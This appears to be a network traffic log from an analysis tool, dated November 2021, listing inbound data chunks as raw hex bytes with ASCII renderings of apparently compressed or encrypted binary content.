                                                                                    2021-11-23 13:42:55 UTC488INData Raw: d7 f7 31 dc 00 84 82 b4 4a 08 c1 48 2e 1e 1b e3 94 f4 40 09 0e d9 3e 2c 4d 3e 8e 50 c0 f1 72 0a 29 66 6f 00 ee 96 a8 c2 7d 94 fb 5d a0 20 48 cb f9 50 b7 56 39 45 ee 41 91 2a 28 59 fd dd a3 9b 0f 51 48 55 a4 5f 14 73 48 90 8b 73 88 cf a0 b3 5e 6e 1d 2c 90 6f 86 92 d7 f2 82 8a e4 dd 7b 49 e0 9d 63 a4 26 cf 87 27 13 df 0f 1b c8 35 c6 cf 39 94 1a c5 2d 69 0d 10 5b d2 73 88 11 bd 4b 10 6b b5 41 65 3e 8d 9b cd 43 bf c6 b8 f4 9a b4 d1 f0 95 84 45 73 da 50 40 34 4e 2c 9a cc 7f c0 6b 3a e3 fe 10 fd 05 ff b2 1b 92 b4 ac bc e7 34 a5 a6 00 68 a4 67 b7 d6 e0 13 00 8f cd 27 c4 f5 c7 d4 4a 52 77 f7 71 a6 e9 ab 61 e0 29 81 2b 3d e6 0c ff 2e 64 4f d3 d9 6f e3 9e c8 6e a6 66 e7 99 d4 94 1f ea 2a f2 8c 1f 61 34 e8 85 a2 bc 78 ae de 1b 06 d4 a3 6d 01 01 86 e3 1a d0 0b 1d 4f
                                                                                    Data Ascii: 1JH.@>,M>Pr)fo}] HPV9EA*(YQHU_sHs^n,o{Ic&'59-i[sKkAe>CEsP@4N,k:4hg'JRwqa)+=.dOonf*a4xmO
                                                                                    2021-11-23 13:42:55 UTC490INData Raw: 13 88 63 4e 2d d5 f5 30 a5 ae fb dd 3c 7e f9 50 1b b1 f7 c3 66 7e 69 98 f8 bc 1b a9 43 17 91 12 7b 5e e2 02 6d 2f 6a 4e 3e 94 8b 33 47 16 2e 84 23 3f aa 70 d6 89 07 42 fb 08 90 7d 2c 25 cf 88 76 67 0a 69 f9 4c 9d 4d 41 c3 e1 03 4a b2 33 9f d7 17 ce 9c c0 89 1e 07 a5 67 7a 2d 87 bb 39 37 73 1c f4 4a e6 e3 45 60 4b 04 30 c4 05 95 93 ce ad 81 95 d1 a7 5d 0a 28 23 d3 37 00 f5 97 03 c6 b2 a7 cf ae e8 30 05 ce 7e f0 fd 8c 57 d9 d5 05 e4 b6 49 b2 c9 89 2c 72 14 88 df 5c e2 21 75 67 e5 b4 4a 55 b3 aa 03 18 36 3d 7f 5f 56 b9 11 1e ea fa d9 2d 87 3b d7 a3 7d e4 63 93 12 e1 0b 53 14 94 28 0e ad 31 bf 97 87 2c 03 bd c5 c8 51 23 ac 4b b9 54 be 56 2a be 67 9b 3d a8 83 dc 9d 5a 81 e4 4c e5 ae ca 2a 56 24 d5 cb 4d 5d 9e ff 6e 12 78 3c fe 9e e1 07 5c e6 f1 1a c8 39 51 4a
                                                                                    Data Ascii: cN-0<~Pf~iC{^m/jN>3G.#?pB},%vgiLMAJ3gz-97sJE`K0](#70~WI,r\!ugJU6=_V-;}cS(1,Q#KTV*g=ZL*V$M]nx<\9QJ
                                                                                    2021-11-23 13:42:55 UTC491INData Raw: f0 64 2a 88 34 a4 87 3f 50 ab ae 92 18 a1 1c 87 6d 5d 05 75 84 32 d0 6f 18 bc ff b2 b3 d2 df 5a 69 86 0d 7a 8d 3a 25 ae 7b 8a 81 ac 78 8c e9 08 59 b8 99 44 da 73 91 1e e4 60 b4 db 09 b1 e8 42 91 1e 4f 8e 41 22 34 65 3e 67 38 1b c7 b1 e2 61 5b de 8c 64 ca f6 0a b0 01 51 cc d0 17 ea 24 31 fe 6a 8c af 32 34 ac c6 bc d0 70 14 7a 31 ed 74 8b 03 c0 49 ab ad 0c 6f c7 b0 c6 ef 99 0d 15 f0 c8 ad 88 f2 b3 e6 f4 c8 46 08 c8 9b e0 16 14 c5 b0 fa a1 37 eb 6a 8a 06 15 42 ed fb a8 98 c4 e9 01 a7 b9 cf d2 22 a8 53 11 8e 76 cf c8 0b a7 30 7b 6a b9 ca 8b df bb 1b 70 8a 5d 09 35 21 e0 a4 b2 35 cb d9 de 5a 58 b0 ef ca fa d9 e8 8c 5e af 04 e8 5d 9b 4b ac 95 90 80 5d e3 3c 86 39 a1 15 df 24 3f 0d 48 36 f8 1c ed fa 14 de 48 5e 26 3f e0 1e d2 2d 33 7a a2 69 13 d2 05 fe 57 73 9b
                                                                                    Data Ascii: d*4?Pm]u2oZiz:%{xYDs`BOA"4e>g8a[dQ$1j24pz1tIoF7jB"Sv0{jp]5!5ZX^]K]<9$?H6H^&?-3ziWs
                                                                                    2021-11-23 13:42:55 UTC492INData Raw: 74 92 fc 84 51 1e bf c3 1f 1b 18 99 fc 56 37 07 0a cb 28 cd 63 fc 7d a7 5e 41 8d 3c 3d 3c b9 86 d6 fe fe bc b1 78 a3 1b b1 7e a3 38 84 da 27 08 42 f6 2b a6 e3 3c 93 76 e6 50 64 c6 ee 7f e2 4d 78 20 57 f3 2f 2a 20 4d 23 cd ec 6e 0e 78 3a af dd eb 1c 25 e1 6c 02 f8 2a b3 54 59 0e eb 55 79 d8 22 b3 d4 bb 64 85 2e 20 9c db e0 a2 b8 d2 77 19 d4 99 ea 6e 7d a3 5c 5c 19 1e a8 0d 48 41 77 ae 47 d0 44 28 50 7b 18 fb 5a 15 57 51 63 2b 52 52 ae c0 84 3f 3b ea d4 30 55 6c 6c da 58 08 bc e0 66 7b 7d 68 86 71 3a b0 f9 5d 5f 2f 48 b7 d9 7d 05 d0 9a 77 e0 82 51 18 e9 a5 64 ee 59 11 83 e7 f1 84 2d e1 dd cb 91 7b 1a 78 a8 e2 7e 84 7b 72 48 35 54 49 43 ce 2c 3c ab e6 34 f0 b0 49 ad 70 43 54 d1 db 59 db 7e 13 de 45 09 28 de a7 f4 a6 59 76 78 b3 d7 55 4a b6 61 e5 2f 6e eb ba
                                                                                    Data Ascii: tQV7(c}^A<=<x~8'B+<vPdMx W/* M#nx:%l*TYUy"d. wn}\\HAwGD(P{ZWQc+RR?;0UllXf{}hq:]_/H}wQdY-{x~{rH5TIC,<4IpCTY~E(YvxUJa/n
                                                                                    2021-11-23 13:42:55 UTC493INData Raw: e1 72 fb 47 36 b3 07 cf 87 11 e9 86 53 27 0d df 6f 33 d9 d2 2f ab 52 7a 78 01 d2 16 97 8d 0b 8a bd e6 b5 62 ad ad 16 9f 10 40 03 2b 6f 34 c9 3a aa b9 a3 5a 35 1f 2a 4f 7d c0 a5 51 86 2e 87 e2 0b 95 49 14 b4 c2 b3 27 21 3e d7 47 c5 bf fa 9c 08 26 b7 5f 9a 13 1d f0 6c 28 1e 3f 88 00 c0 8a 5d cb 65 5d d2 f3 30 e8 0d a9 49 c5 68 a5 61 b5 be 88 03 50 1b 7c e2 dc 37 bb cd 0a 22 f0 42 77 98 b6 5e b0 82 5c 9c 80 1b a7 d7 d1 f2 f4 1d 59 7c 53 e4 6a 8a d4 82 02 68 6e 29 06 22 33 5c b5 bc ee 30 a7 49 75 b4 b8 02 06 49 f2 b7 4a 74 a3 41 e6 91 8a 62 67 4f a6 b0 5f 46 16 fa 0e b0 27 58 80 52 f6 8b 5b c5 80 12 de 4a ba 53 63 22 17 92 22 99 a9 30 05 f0 a1 35 a0 4c 1e 6e fc 68 a5 35 d8 1b 6b 47 68 7a 6c c4 ef 71 ef a8 5e 39 0d 45 9d e9 4f 73 10 59 2b f9 bb 7f 79 09 96 24
                                                                                    Data Ascii: rG6S'o3/Rzxb@+o4:Z5*O}Q.I'!>G&_l(?]e]0IhaP|7"Bw^\Y|Sjhn)"3\0IuIJtAbgO_F'XR[JSc""05Lnh5kGhzlq^9EOsY+y$
                                                                                    2021-11-23 13:42:55 UTC494INData Raw: 0c fa b5 c7 74 d2 a4 9d 1d c5 d0 59 c4 75 aa 33 df 64 be 8d 86 1d 1c 07 77 31 52 6c 22 8d ec 46 ba 70 6c b2 d1 95 54 63 fb 7c fe 9a e5 79 fa 63 00 bf 51 8a ef 75 9d ae 8c 32 47 b1 88 02 ad 1b cb 31 31 da 45 ad 5d 96 e8 72 19 52 ed 07 2d 9d ed b3 77 ba 3d e4 ad 77 b6 d1 00 70 5d 46 3e 9b d1 2a 59 e6 bf ff 23 0d a5 da 63 bb 05 6b 13 18 31 3a d3 f9 bc 3b ef f4 1d 8d 03 a3 ff f7 3d 6b e5 12 39 a2 ea f4 2d 7a 65 6f 0a e6 e6 cb fa c6 78 27 e9 cf 87 70 52 f5 80 fd e4 ab f3 fe 7c 75 f6 51 2c b1 99 95 db 71 3c e8 31 ae 36 96 c4 be 14 f2 67 8f 83 f1 3f ca 53 1f 65 fd 19 3e 65 e6 8e af 52 3d 62 15 5e a8 27 d8 53 73 da ee d4 b7 9a 98 b1 c2 6e a2 02 60 2d d1 67 ab 70 5d f3 aa 50 1e cc 5e 25 4e 10 ae 14 6f b8 2d 80 41 21 87 1f c6 36 a5 a4 01 f5 98 03 12 26 a7 cf 24 40
                                                                                    Data Ascii: tYu3dw1Rl"FplTc|ycQu2G11E]rR-w=wp]F>*Y#ck1:;=k9-zeox'pR|uQ,q<16g?Se>eR=b^'Ssn`-gp]P^%No-A!6&$@
                                                                                    2021-11-23 13:42:55 UTC495INData Raw: 74 ae 40 e8 d8 1b e7 6f a6 41 76 27 63 32 b0 5d 60 2a cd 27 78 08 21 7e 0c 51 e1 c8 b9 7d c9 af da 91 b4 f8 84 83 f1 f6 ec 7c b5 3e 37 51 c9 13 f3 a3 13 b3 7a 3a 8a 9d 63 92 2b dd d4 6f be e2 bc 82 92 55 ca e4 f4 56 cd 04 98 95 6e 33 70 e6 a3 42 4b eb a2 a6 3d 3b 21 dc 02 a6 a7 c9 66 cb 4a f5 6f 51 00 35 bc 41 09 3b 04 f8 03 e3 d5 b8 ca 9a 07 93 f3 a6 3a 51 ba 58 9c e6 53 4d 40 ac e6 d6 98 37 fd aa 79 68 d1 8d 1f 65 48 e9 fa 20 bc 6e 59 3b 91 a7 da d4 aa 62 a5 88 52 52 e4 1a ff a0 32 bc e9 73 a4 ec 86 1e 59 43 59 3d a2 70 e2 cf 2b 34 90 f9 60 0e 34 48 fd 38 2e 25 81 7b 10 10 5b f0 f8 3c a2 b6 e2 da 9b 83 e8 78 a7 14 d6 bb 64 43 ad 20 db 37 50 19 8c b5 47 c0 4c 3d ac 78 df f0 02 17 0f 0d 07 15 ed ee a5 d6 76 c1 62 80 86 c8 18 98 f1 e6 60 a5 07 ca da 1e d4
                                                                                    Data Ascii: t@oAv'c2]`*'x!~Q}|>7Qz:c+oUVn3pBK=;!fJoQ5A;:QXSM@7yheH nY;bRR2sYCY=p+4`4H8.%{[<xdC 7PGL=xvb`
                                                                                    2021-11-23 13:42:55 UTC497INData Raw: ab 73 58 6d a7 c9 cf e5 9c 46 3c 7e 40 4c c1 e1 78 96 f3 73 62 4f c8 a1 af aa 15 fe af 0c 88 af 49 a3 bd b0 75 e4 59 a5 c1 bd ed 41 54 cb c7 df 1c 8b 6b 82 15 9c e2 38 4c 51 cf 71 1a 75 de 84 2f 24 df 62 c5 15 95 b7 61 e8 bf 24 a3 2e 9f 10 1b e1 8c 25 1b 5b f2 fc 61 c0 40 cd 66 63 5f 6a d3 ab 04 82 46 ca 26 d8 00 43 05 5e ce 02 c6 c8 a8 c7 b4 ef 4b 7a 90 23 95 d7 5a f6 3f 56 b3 a8 95 aa ec 86 26 7c fa cb fe db 8e 63 7b 19 a2 6e b8 5c b4 be 1e 21 a2 b2 f6 b5 23 5b 75 17 1a 33 00 09 b1 95 40 d2 44 46 16 ca e5 82 7e 33 0e be 9a 54 60 28 e2 ed b5 0c 10 ea 2d 63 73 7f 0b d3 b2 29 64 6b 53 0d 5e 28 5d e3 a5 ca 94 1f 66 5b 0e 74 74 9c f2 c9 f2 35 c4 9a 28 c8 89 53 ae 98 20 d4 fb 3e 35 9a 29 fe 55 61 0a 89 ad c6 d7 2b 51 1b 20 d6 43 3c 1e 1f e3 e2 de a4 bd a0 e6
                                                                                    Data Ascii: sXmF<~@LxsbOIuYATk8LQqu/$ba$.%[a@fc_jF&C^Kz#Z?V&|c{n\!#[u3@DF~3T`(-cs)dkS^(]f[tt5(S >5)Ua+Q C<
                                                                                    2021-11-23 13:42:55 UTC498INData Raw: 1b 0f 0f 2d 0e f8 c6 a5 c6 61 da 64 9e b3 d3 1e ea ca e5 62 90 01 a6 88 29 d2 a2 0d 8a 24 f4 ba b6 3e 42 51 29 c3 b7 56 5b 9a 97 e5 2f bf 03 a9 21 a8 ad 17 a8 74 bb d4 90 2b 20 cb 5f 63 63 a8 d1 e6 34 d5 67 a2 24 dc d1 f9 29 61 08 03 bb 1b bf 7c 67 93 84 c7 e1 0e 1a b9 f1 2c 2a 96 36 a0 ba 84 54 9d 6f 6b 43 5f 61 80 be fb 28 ee 82 26 29 ef 84 cb 8b c5 68 7d b6 33 f8 26 cf b3 41 77 77 91 3b 4d 84 8f cc 35 50 07 10 d0 cd c9 6b 60 f4 37 ea 47 14 bd a4 06 85 c0 b8 5a 56 d0 f0 73 99 73 7e 31 5d 18 84 87 0c de ca 89 33 4f 5f 67 75 9c 4e 7f bd 9f ba 4d cf 9e b0 71 2f 1a 31 7c d5 93 ab b8 07 04 f4 9d 7c e4 c0 20 57 fd 75 9a 2c 8b 77 05 0e e4 1d 5b f6 fe d9 a0 62 57 cc 47 be 4a 04 bf ee 6e 17 06 08 c3 05 5f 2d 25 e5 58 35 6f c2 03 3e f4 38 38 f9 21 71 23 dd 50 9e
                                                                                    Data Ascii: -adb)$>BQ)V[/!t+ _cc4g$)a|g,*6TokC_a(&)h}3&Aww;M5Pk`7GZVss~1]3O_guNMq/1|| Wu,w[bWGJn_-%X5o>88!q#P
                                                                                    2021-11-23 13:42:55 UTC499INData Raw: 8c 22 c2 4c 57 6c ad 9c 87 d8 32 3e 7e 10 ee 4f 0a 0b 1c f0 fc cd fc f2 a0 91 63 3a 35 63 fd 1e c3 b1 ad 88 c5 fb 80 0a 44 22 a9 af 27 39 25 ab f2 41 2e 17 45 38 f5 45 85 df 4b e2 43 ff 44 62 28 79 32 95 01 7e 19 8d 3c 64 04 0d 4c 2d 6f e8 f1 96 46 d3 aa 89 b9 ad 97 95 b7 cc f1 bc 50 eb 38 18 5f 86 60 b9 f1 0c a3 08 1b 8b 8a 74 bc 14 d9 d1 7d c9 da 9e b7 af 10 f3 f1 e2 01 ec 1d ec a7 6b 66 67 eb 81 1f 66 f3 b0 81 00 1b 01 e6 08 d1 bd c4 31 ae 0a bc 58 79 20 26 a9 1b 03 3a 30 ae 57 d3 d9 8c e9 bb 20 8b a4 bb 18 21 9d 17 ce 8c 15 13 45 ad e9 d4 c0 60 dd 9b 60 7c 83 8e 0c 5b 4f cd cc 00 94 7e 68 38 dc b0 f6 e7 bd 71 8a de 6d 4c bb 4f c2 ca 12 a0 ce 34 b9 ea a1 07 64 0e 13 63 a1 79 dd e6 17 27 dc fd 56 0f 71 6e d4 2e 1f 05 98 6a 6e 62 71 bf e6 62 fa c5 c1 af
                                                                                    Data Ascii: "LWl2>~Oc:5cD"'9%A.E8EKCDb(y2~<dL-oFP8_`t}kfgf1Xy &:0W !E``|[O~h8qmLO4dcy'Vqn.jnbqb
                                                                                    2021-11-23 13:42:55 UTC500INData Raw: 5f 1f 4d 6b a2 05 1e 6b 36 bc 01 37 4d 93 05 71 9d 6f 7c a6 05 54 2b f7 60 9e 1d 24 85 d9 88 45 df 73 f6 00 02 51 4c ed 09 41 4e 95 65 69 db 93 13 28 81 4a 7b ab 6d 78 62 8f df e7 df 96 73 1a 53 71 4a d6 dd 51 c8 ab 03 35 1b d6 98 ec 89 4e e0 8a 07 84 b0 42 b8 8d 98 4b b1 45 95 fb b1 d7 56 0b d8 b9 b1 6e 8c 44 81 24 8d 86 12 55 5c cb 68 5c 45 fa bd 3d 07 87 11 95 41 8b 8e 5e ea e9 70 d5 2c de 20 2d c9 bb 5b 0d 46 9e eb 79 dd 45 cc 42 2d 11 03 9f f8 75 91 50 de 2d 89 42 41 02 50 cf 22 92 cd c0 cb a8 a8 19 7f ae 0a 90 93 67 b2 75 19 a7 b3 83 f3 c9 a9 20 5f f4 92 89 f4 83 5d 72 26 ae 4b fa 74 9f 9c 0a 64 fc d7 a5 fc 3b 4c 7e 48 1e 3c 20 20 fc 9b 58 e7 40 58 3e eb e5 bd 7e 61 2e a7 81 0c 14 46 a7 bf c4 32 16 fc 7e 18 77 54 1f a5 8c 32 3a 3f 69 20 74 17 65 d6
                                                                                    Data Ascii: _Mkk67Mqo|T+`$EsQLANei(J{mxbsSqJQ5NBKEVnD$U\h\E=A^p, -[FyEB-uP-BAP"gu _]r&Ktd;L~H< X@X>~a.F2~wT2:?i te
                                                                                    2021-11-23 13:42:55 UTC502INData Raw: e3 c8 17 36 ce 9f 60 2f 10 14 ac 7a 6c 6b 99 72 5d 07 52 f4 c4 11 8a 89 85 e4 a8 b0 c3 11 fd 48 e5 8f 65 7f a0 7f 8c 52 14 22 94 9f 55 da 49 33 df 7b d5 c4 1c 2a 0e 34 02 3f bc 82 e3 88 73 fa 41 85 f7 ea 2a 9a f0 f1 46 85 0a fb be 33 82 98 19 b5 12 f7 97 97 3d 70 40 7a d2 e5 00 7d bb b9 ba 31 8e 77 96 27 c2 ae 25 8e 3d de 97 dd 0c 2a da 2a 32 37 ad ca b8 01 c1 4c 97 1e 80 f9 fc 29 49 22 10 8d 15 c9 78 66 a0 94 da b1 20 18 a5 c9 63 7a 93 29 c1 ad 8d 12 c5 7a 60 07 34 7f 93 be ae 69 a1 d8 38 3e cd 99 ed d6 95 56 5f f4 07 ff 39 eb d7 46 54 3d ad 32 49 cf d5 98 0a 59 63 10 86 f8 f7 75 3e cd 35 de 07 05 8a b4 05 b6 9d a9 0e 32 96 bf 02 bd 54 2e 36 3f 65 ec 97 24 9f f5 98 10 35 1f 7c 5a 8d 77 6c b9 a2 92 6c 9a 8b ad 52 07 30 09 5c da 92 fd de 36 5d ec 8e 6a fa
                                                                                    Data Ascii: 6`/zlkr]RHeR"UI3{*4?sA*F3=p@z}1w'%=**27L)I"xf cz)z`4i8>V_9FT=2IYcu>52T.6?e$5|ZwllR0\6]j
                                                                                    2021-11-23 13:42:55 UTC503INData Raw: 87 64 19 30 ee f7 c7 1d 30 ee 2a 48 6d 2f 4a 81 9b 07 50 45 4b 2f 4a 19 56 bb e8 cd b3 17 67 73 12 52 32 99 d6 dc f0 76 de ba 16 f9 b4 00 e8 c4 23 c4 eb 42 12 ca 06 c0 59 2a 14 ca 8e ea 92 1c 60 1c 0c f3 71 68 32 75 ac 8b 89 fc be cf ed 10 7b 1f 47 c5 0c cb 86 cc b4 d0 c8 ab 23 56 3b d2 fc 0a 5c 29 a3 d8 6f 69 4d 0f 62 fe 00 a9 df 08 d7 48 a9 63 10 17 69 6f ee 73 02 67 cc 03 65 29 0f 59 3d 5c c3 fd b4 66 cd 8f dd 8e 8b ca e0 c8 e1 cb bd 02 e7 50 62 09 ca 2b e2 95 24 e4 10 2e a4 c6 4e ca 35 e6 ed 2c c2 84 bb c4 8d 52 d1 9b a8 25 87 5a c7 8f 4a 2d 70 e1 89 4f 75 8b b5 a6 1d 6a 23 8f 0b f5 9e f3 46 f9 68 bc 14 3d 4c 7f 8e 67 52 19 1b e4 5a a9 cc 90 ce be 0d 90 fd b8 03 17 bc 19 bf ba 41 13 09 e8 a4 9f 88 51 c1 a4 72 5e d9 a5 26 59 33 ca e7 1d 98 53 5a 79 92
                                                                                    Data Ascii: d00*Hm/JPEK/JVgsR2v#BY*`qh2u{G#V;\)oiMbHciosge)Y=\fPb+$.N5,R%ZJ-pOuj#Fh=LgRZAQr^&Y3SZy
                                                                                    2021-11-23 13:42:55 UTC504INData Raw: 33 d2 3f 4c ad d1 a3 6d ec 9f a4 4a 26 50 1d 59 e7 85 e8 d2 27 24 f1 bb 57 f0 9c 76 7d d8 64 9e 28 d5 4a 32 21 8e 1e 4b ca bc ea a3 65 59 b8 23 f8 19 01 bf b9 4f 40 0d 52 d4 1e 6f 21 36 d8 19 56 63 c0 4f 22 cb 22 34 a0 4c 3e 4a 90 0e 86 17 2e bf c4 a7 7f fd 32 fa 29 48 52 46 89 49 7f 57 c0 0a 7e bc b1 24 68 ae 55 5b b2 4b 68 44 8c e0 e7 ad af 5e 13 58 5b 76 f8 e1 3d f5 b5 3e 67 44 d0 b9 f8 bb 14 c6 9d 32 c9 b9 4b b0 81 8d 61 b4 5b e5 d9 87 e5 5c 1c b4 f8 b2 3d 88 33 92 52 d2 d7 1a 43 46 d9 41 6a 0f 82 d1 62 56 99 2c c7 2e b3 8b 1d ee 8f 2c c7 09 ae 10 4b e1 a3 7c 17 70 b3 f4 7e c5 47 82 3e 10 0f 3e cd 9c 47 95 10 fd 06 cb 2c 4d 72 6c eb 0f ef f7 8c c1 94 e7 6a 41 b5 71 da ae 79 8f 27 55 b8 fb b1 a7 f5 8a 5c 71 af ce cf aa 89 63 50 48 83 54 85 73 b8 9a 39
                                                                                    Data Ascii: 3?LmJ&PY'$Wv}d(J2!KeY#O@Ro!6VcO""4L>J.2)HRFIW~$hU[KhD^X[v=>gD2Ka[\=3RCFAjbV,.,K|p~G>>G,MrljAqy'U\qcPHTs9
                                                                                    2021-11-23 13:42:55 UTC506INData Raw: d6 6e 7e 73 87 f2 f0 b6 66 c8 b3 77 4f d8 85 3d 46 41 e9 a3 55 f3 36 69 1f 87 a3 f0 e2 fb 43 8e c1 6f 79 c9 26 c1 d4 44 95 b4 31 99 e1 94 51 64 0e 13 63 a1 3b f2 93 21 18 f2 cd 61 11 72 78 eb 13 23 60 b2 21 56 0d 7b e9 e1 1c 93 97 86 e1 b5 df da 70 97 41 f9 a2 69 4b fe 06 ef 33 68 3c c3 dc 06 88 49 6e d8 7f ee d8 03 33 0f 3b 74 33 d8 b1 a7 f2 7a c2 6c 98 a2 f2 1b d7 a5 84 36 ec 13 fd ff 08 fd 8f 7a 8d 33 ed a5 e8 3f 69 6f 27 e9 8c 69 59 a0 8f b2 17 cd 05 af 39 fb a7 24 af 34 b7 df 8c 2f 2c e3 7b 63 45 be db f5 77 84 23 a3 60 e1 f3 c4 02 66 0a 35 8a 2e 89 6a 14 d0 ba e8 c7 30 0c ed d7 0b 7e c8 53 d3 f5 9a 77 98 68 79 79 15 6a 84 ba eb 20 d7 8e 7b 2f ef bb ee a2 af 79 67 a7 6e c0 30 91 8c 04 42 5a b8 1e 5b b1 86 a1 4e 57 0b 60 f7 f5 84 1f 2c 9a 23 fb 75 1b
                                                                                    Data Ascii: n~sfwO=FAU6iCoy&D1Qdc;!arx#`!V{pAiK3h<In3;t3zl6z3?io'iY9$4/,{cEw#`f5.j0~Swhyyj {/ygn0BZ[NW`,#u
                                                                                    2021-11-23 13:42:55 UTC507INData Raw: d0 1a 66 9f a4 a8 9d c7 b1 09 58 f0 97 86 a7 ac 4f 45 3d a6 54 8b 04 e8 d3 78 64 b0 98 e1 8f 12 63 5e 5e 0f 69 25 3d fb 90 47 d8 47 58 06 fd ed 83 4c 0e 75 d7 d5 0c 58 09 f4 ee c6 1f 3b cb 04 16 64 29 16 a7 91 05 4a 67 6c 36 55 2e 4b b3 98 87 d2 4f 78 70 3a 60 58 96 f1 ce f1 50 cb bf 30 e7 bb 74 b2 ba 3e de c6 06 74 df 79 c3 6b 34 2d cf ad e9 c2 70 02 1f 38 c1 79 09 23 23 d3 ca 97 c1 ec 9d c3 09 2c 33 19 f9 49 f4 96 d9 c2 ec ce 86 36 74 31 a4 dc 17 68 27 8d cb 16 2a 7f 73 7f 83 59 f4 cc 25 a5 5b 9f 5c 6e 10 48 18 84 18 1c 5a 9e 76 60 25 79 65 0a 4d d0 fc b9 5f ec f2 d8 9f af bf 89 c5 e6 ee 8f 70 b0 03 73 72 f5 3a d0 a0 29 81 11 22 8d b1 21 a4 33 d5 c7 2c c2 df e8 f1 c4 09 d7 91 a0 17 cd 1e 81 98 64 0c 44 f5 b5 14 6c f9 9e 86 27 0a 1a df 20 9b d5 ab 2f 93
                                                                                    Data Ascii: fXOE=Txdc^^i%=GGXLuX;d)Jgl6U.KOxp:`XP0t>tyk4-p8y##,3I6t1h'*sY%[\nHZv`%yeM_psr:)"!3,dDl' /
                                                                                    2021-11-23 13:42:55 UTC508INData Raw: f0 63 d0 4b b7 ba 5b e6 93 78 91 29 82 2c 25 fe b2 7c 64 67 e1 bf 2d 90 41 d1 6d 7d 6d 64 ed 82 41 b5 69 db 7e dd 07 70 38 13 db 29 93 d2 e2 e1 8f d1 1a 4e 95 3f a3 cf 05 e4 66 75 a3 89 b1 88 ac ba 5b 53 a1 a4 dd a3 91 40 64 1b 9f 5c 9c 6d b9 a2 35 0a f5 a3 ef 87 3a 41 4a 62 30 02 0d 48 83 b6 6a 89 71 62 43 f0 f1 a7 68 7a 25 bc a3 76 5a 0b e8 b2 88 4a 5a bb 39 59 4a 5c 3d 96 bf 78 44 61 52 0c 62 1a 79 c1 fc e1 80 4a 2d 41 06 14 39 83 fa d0 d7 4f d9 c8 2c e9 ec 6f 99 9c 34 80 cb 3f 31 d6 7d 91 18 5c 28 cd b2 da e7 17 67 21 6c 9d 52 64 20 12 e8 e1 f3 85 97 fa c0 1c 07 36 15 fc 07 d1 96 c8 b6 b5 f1 a5 27 7b 30 99 d9 39 62 1b 9e e4 1b 13 09 78 6a 9c 79 9e e4 28 d2 72 ff 6a 05 23 78 16 8b 22 5b 35 8c 28 4e 00 77 63 1f 6c ab c1 92 79 fb bf fa be 9e cd b0 9f ce
                                                                                    Data Ascii: cK[x),%|dg-Am}mdAi~p8)N?fu[S@d\m5:AJb0HjqbChz%vZJZ9YJ\=xDaRbyJ-A9O,o4?1}\(g!lRd 6'{09bxjy(rj#x"[5(Nwcly
                                                                                    2021-11-23 13:42:55 UTC509INData Raw: 13 c2 2d a7 32 c2 fb bd 32 5a 22 13 dc 0b a0 46 5d 83 c8 e8 fc 29 39 b9 d9 0b 07 bc 6e f0 eb d6 53 b8 41 6d 5d 30 67 97 84 e7 0a e7 b1 7e 09 b3 c4 f0 95 b3 14 76 92 09 e7 38 90 8d 01 5c 4c b7 2c 7d 92 b3 94 29 64 74 09 f8 de f4 22 0f 84 6f e9 76 1a 86 a0 3b 96 fb f9 7a 57 fe b1 37 86 25 72 51 03 66 f5 f4 25 f6 c4 c8 10 7f 63 44 5e 95 76 6e 9d aa e1 64 fb 97 9a 79 04 03 6d 1b 93 ca da 9b 16 3a cb bb 39 ee e1 29 4f f0 60 96 7a ac 50 2b 22 b2 03 77 d1 ba c2 99 2e 4a f2 41 a9 12 32 95 e9 7f 0b 06 63 e0 08 68 09 70 b5 76 45 37 d0 26 7f f1 0e 31 a2 41 60 39 86 42 c4 0b 71 ea ec 98 66 c2 30 d4 50 09 6f 57 8c 7c 03 3e 91 2b 3b ab 98 2e 11 9f 52 06 a9 31 7a 48 f3 ad a3 a8 88 6b 79 40 5b 4e eb ec 67 c7 e3 72 2f 55 9f ac fe be 2e f9 f6 34 86 c0 11 c2 fa e8 76 87 47
                                                                                    Data Ascii: -22Z"F])9nSAm]0g~v8\L,})dt"ov;zW7%rQf%cD^vndym:9)O`zP+"w.JA2chpvE7&1A`9Bqf0PoW|>+;.R1zHky@[Ngr/U.4vG
                                                                                    2021-11-23 13:42:55 UTC510INData Raw: 12 9a 45 16 3b e5 3c 57 25 04 69 01 56 df ad ef 45 f7 a3 80 b9 89 9f e1 9b c4 f7 ad 50 a9 63 08 61 df 59 a2 a7 7d e3 47 06 a5 ca 74 cd 6d 8a fd 4c cf eb 9b 85 b3 4e ce f1 da 56 95 32 ee 93 4b 37 48 fd 9b 74 4e d6 8e 8e 78 23 70 cc 48 f3 89 e7 6e c1 1d b8 68 67 0e 2d 90 49 5f 21 3b f1 00 a7 ff 89 96 aa 21 b1 ea ad 49 72 d7 5b c5 cd 54 41 51 db c8 ec b0 5c cb a4 2f 41 d2 9d 0e 65 52 d6 f7 65 8f 7d 6a 1b ba bc 86 85 80 2e f9 c0 52 43 ec 11 cb ed 47 9e d0 6b 89 ee a5 07 2f 62 08 36 a0 4c f4 e8 02 71 eb e5 68 0a 0a 67 91 59 72 27 ae 4c 7c 23 79 c7 d5 08 ab f4 d1 c6 9b 85 e9 7a a9 45 ec 93 6a 52 95 7f cf 15 42 20 b9 9f 11 d9 48 6c de 5d d4 ed 13 3d 42 49 2f 20 cf c7 f6 d1 57 9c 48 9f 82 d7 5e b0 c1 cf 60 9b 23 9d e7 42 b3 f6 63 9e 20 e3 81 ea 7b 53 74 15 83 ec
                                                                                    Data Ascii: E;<W%iVEPcaY}GtmLNV2K7HtNx#pHnhg-I_!;!Ir[TAQ\/AeRe}j.RCGk/b6LqhgYr'L|#yzEjRB Hl]=BI/ WH^`#Bc {St
                                                                                    2021-11-23 13:42:55 UTC511INData Raw: 6e cd e1 71 96 a4 69 50 44 e2 a0 c0 a9 30 d9 f8 13 99 c5 58 8e a0 ec 23 d7 44 9a d7 ad c0 69 22 c3 c1 9e 29 df 05 c0 5a 94 fe 01 6f 66 fd 5c 51 62 f0 9a 16 1e 89 64 f8 10 aa ea 76 b3 8f 26 9e 40 e6 40 52 f5 d9 58 1b 51 98 dc 60 99 67 d0 57 29 7e 60 e6 a8 42 8d 1a d8 30 e8 49 1b 56 09 81 16 e1 d3 8c f2 8a f4 48 2c d3 18 a4 fb 14 c1 23 7b 99 f8 a7 f6 f9 be 52 2f 9c 87 c3 ef 82 65 4e 2b 97 6d 93 5b 90 b5 36 36 b7 9a d4 b3 1c 6d 2f 21 6e 33 1c 2d 89 8b 76 ca 55 34 1a e6 b3 bc 52 44 1b 84 b3 01 60 19 c5 bf b5 69 44 f7 1c 17 6f 74 09 e4 b2 35 62 66 4e 33 76 05 44 f6 